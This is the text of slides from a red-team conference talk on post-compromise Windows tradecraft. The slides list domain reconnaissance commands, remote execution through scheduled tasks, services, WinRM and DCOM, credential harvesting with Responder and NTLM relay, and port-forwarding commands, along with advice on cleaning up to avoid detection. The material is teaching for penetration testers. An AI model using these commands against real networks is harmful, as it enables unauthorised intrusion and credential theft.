Matt Batten (sleepZ3R0) spoke at BSIDES AUGUSTA and BSIDES RDU these are our slides. Hope you can learn and benefit from them. If you have any questions feel free to send us messages on twitter we will always respond.
2. Matt Batten (SleepZ3R0)
▶ Twitter: @SleepZ3R0
▶ https://github.com/SleepZ3R0
▶ Where I work:
▶ Husband / Red Teamer / Penetration Tester / Developer /
Marine Corps Veteran / Cat Dad
3. Collyn Hartley (HA12TL3Y)
▶ Twitter: @HA12TL3Y
▶ Military Red Teamer
▶ Brother / Red Teamer / Penetration Tester /
Active Duty Military / Dog Dad
4. What will be covered
▶ Initial Recon once on a compromised system
▶ Lateral movement
▶ How to do port forwarding in more than one way with real examples
▶ How to utilize tradecraft to not get caught while moving
▶ What tools are being used today
5. Setting the Stage
▶ You have already compromised a system utilizing your preferred
method
6. First things first…
Once on a compromised system here are some questions to ask
yourself.
▶ Who am I on this network?
▶ Where am I in this network?
▶ Can I move to another system with my current permissions?
▶ Can I get system on my current compromised system?
7. Understand your surroundings
Part 1
▶ net user
▶ net user /domain
▶ net group “Domain Admins” /domain
▶ net group /domain
▶ net use
▶ net start
▶ net localgroup
/domain
▶ netstat -ano
▶ netsh firewall
show state
▶ netsh firewall
show config
21. Remote Code Execution #2
▶ SCHTASKS
Shell schtasks /create /tn <matt.exe> /tr c:windowstempmatt.exe
/sc once /st 00:00 /s <target> /RU system
Shell schtasks /run /tn <matt> /s <target>
Then delete the tasks after it executes
Schell schtasks /F /delete /tn <matt> /s <target>
22.
23. Remote Code Execution #3
▶ SERVICE (SC)
Shell sc <target> create <matt>
binpath=“c:windowstemp<matt.exe>”
Shell sc <target> start <matt>
Make sure to delete the service after it runs
Shell sc <target> delete <matt>
26. WinRM
▶ On port 5985 and 5986 (5986 is for encrypted)
▶ If 5985 is open then you can enumerate using WinRm
▶ Have to have local admin permissions to run:
Invoke-Command -ComputerName TARGET -ScriptBlock {commands}
Windows Server 2008 and newer there is Windows Remote Shell(WRS)
winrs -r:http://WIN-2NE38K15TGH/wsman “cmd”
29. DCOM
▶ Matt Nelson documented this method of using DCOM over RPC to
instantiate a "MMC20.Application" COM object and then calling the
ExecuteShellCommand method.
▶ Result:
▶ Immediate command execution under the administrative
account used.
▶ Implementation Details:
▶ Connecting to remote procedure call portmapper interface
(RpcSs service in svchost.exe directly listening on TCP port 135)
then to an RPC server on an ephemeral port (such as 49154 or
49159 etc.).
31. Responder
LLMNR and NBT-NS Spoofing Attack is an easy way, even today,
to harvest credentials and laterally move based off of normal
network traffic.
34. Multi-Relay
▶ A powerful pentest utility included in Responder's tools folder giving
you the ability to perform targeted NTLMv1 and NTLMv2 relay on a
selected target.
▶ Currently MultiRelay relays HTTP, WebDav, Proxy, and SMB
authentications to an SMB server.
▶ This tool can be customized to accept a range of users to relay to a
target. The concept behind this is to only target domain
Administrators, local Administrators, or privileged accounts.
35.
36. PORT FORWARDING
▶ SSH port forwarding
ssh -L 8080:internalTarget:80 user@compromisedMachine
▶ Metasploit port forwarding
portfwd add –l 3389 –p 3389 –r 172.16.194.191
▶ Plink port forwarding
plink.exe {host-B} -P 22 -C -L 127.0.0.1:444:{host-C}:3389 -l username -pw
password
▶ Proxychains port forwarding: SOCKS with CobaltStrike
45. People who have influenced us and this talk
(even if they don’t know it!)
@harmj0y @malwareunicorn
@_wald0 @ReL1K
@CptJesus @mstair
@MadHatt3r @MalwareJake
@shortxstack @enigma0x3
@r3dQu1nn @danielhbohannon
@merrillmatt011 @georgiaweidman
@PyroTek3 @mubix
@byt3bl33d3r @H011YxW00D
@armitagehacker @Lee_Holmes
@gentilkiwi @SpectorOps
46. If you enjoyed this talk and would
like to know more
▶ Check out the references on slide earlier.
▶ Slides will be published publicly
▶ Because we do not know where we are posting the slides yet if you
follow on Twitter we will let you know shortly
▶ If you have any questions or just interested in talking feel free to
message either of us on Twitter, and we will respond in a timely
manner.
▶ @SleepZ3R0
▶ https://github.com/SleepZ3R0
▶ @HA12TL3Y
Questions?